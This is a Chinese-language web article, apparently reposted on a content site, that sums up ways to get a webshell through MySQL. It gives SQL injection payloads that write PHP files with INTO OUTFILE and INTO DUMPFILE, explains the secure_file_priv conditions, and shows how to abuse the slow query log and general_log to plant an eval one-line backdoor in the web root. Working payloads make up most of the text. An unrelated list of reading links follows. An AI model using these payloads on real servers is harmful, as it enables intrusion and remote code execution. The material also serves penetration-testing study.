mysql数据库中getshell的方式总结

outfile和dumpfile写shell
利用条件

数据库当前用户为root权限；
知道当前网站的绝对路径；
php的gpc为 off状态；(魔术引号，get，post，cookie)
写入的那个路径存在写入权限。

基于union联合查询：?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'c:\phpstudy\www\shell.php'%23?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'c:\phpstudy\www\shell.php'%23
非联合查询当我们无法使用联合查询时，我们可以使用fields terminated by与lines terminated by来写shell
?id=1 into outfile 'c:\phpstudy\www\shell.php' fields terminated by '<?php phpinfo();?>'%23代替空格的方法
+号，%0a、%0b、%a0 、 /**/ 注释符等
outfile和dumpfile的区别 outfile:

1、支持多行数据同时导出
2、使用union联合查询时，要保证两侧查询的列数相同
3、会在换行符制表符后面追加反斜杠
4、会在末尾追加换行

dumpfile:

1、每次只能导出一行数据
2、不会在换行符制表符后面追加反斜杠
3、不会在末尾追加换行

因此，我们可以使用into dumpfile这个函数来顺利写入二进制文件;
当然into outfile函数也可以写入二进制文件，但是无法生效（追加的反斜杠会使二进制文件无法生效）
当我们使用dumpfile，应该手动添加 limit 限制，来获取不同的行数
secure_file_prive mysql的secure-file-prive参数是用来限制load data, select ,outfile, and load_file()传到哪个指定目录的。

secure_file_prive= ，结果为空的话，表示允许任何文件读写
secure_file_prive=null，表示不允许任何文件读写
secure_file_prive=‘某个路径’，表示这个路径作为文件读写的路径
在mysql5.5版本前，都是默认为空，允许读取
在mysql5.6版本后 ,默认为null，并且无法用sql语句对其进行修改。所以这种只能在配置进行修改。

查询secure_file_prive的参数
show global variables like "%secure%"利用sql语句修改参数
【mysql数据库中getshell的方式总结】set global secure_file_prive= 但是5.6后不能利用sql修改了，所以只能利用配置修改

修改value的值：
windows下修改配置文件：mysql.ini
linux修改配置文件：my.cnf

日志getshell
慢日志getshell 慢日志：
一般都是通过long_query_time选项来设置这个时间值，时间以秒为单位，可以精确到微秒。如果查询时间超过了这个时间值（默认为10秒），这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下：
show global variables like '%long_query_time%'show global variables like '%long%'查看慢日志参数
show global variables like '%slow%'
对慢日志参数进行修改
set global slow_query_log=1 #打开慢日志set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日志的路径注意：一定要用双反斜杠select '<?php @eval($_post[1]);?>' or sleep(11)这儿11是超过慢日志的10秒时间
利用general_log 利用general_log，可以将所有到达mysql服务器的sql语句，都记录下来。
相关参数一共有3个：general_log、log_output、general_log_file
show variables like 'general_log';-- 查看日志是否开启set global general_log=on; -- 开启日志功能show variables like 'general_log_file';-- 看看日志文件保存位置set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置show variables like 'log_output';-- 看看日志输出类型table或fileset global log_output='table'; -- 设置输出类型为 tableset global log_output='file';-- 设置输出类型为file一般log_output都是file,就是将日志存入文件中。table的话就是将日志存入数据库的日志表中。
getshell
set global general_log=onset global general_log_file='需要攻击的路径'select '<?php eval($_post[cmd]);?>'这样就将一句话木马记录到general_log中，从而getshell
binlog的介绍
总结到此这篇关于mysql数据库中getshell方式的文章就介绍到这了,更多相关mysql getshell的方式内容请搜索www.887551.com以前的文章或继续浏览下面的相关文章希望大家以后多多支持www.887551.com！

mysql数据库中getshell的方式总结

推荐阅读

关于节约粮食的名言诗句关于节约粮食的名言和诗句

奋斗励志朋友圈句子励志短句致自己奋斗朋友圈

想发朋友圈表示心情不好的句子心情不好发朋友圈的句子心情短句

贝拉玻尿酸是合法的吗贝拉玻尿酸是进口的还是国产的

核桃仁做菜的菜谱，您知道桃仁脆溜鸡的做法

浅紫色显皮肤黑还是白

库伦旗景点

居家隔离和集中隔离的区别什么情况下要隔离28天

蝉蛹是什么

怎样能丰胸最安全有效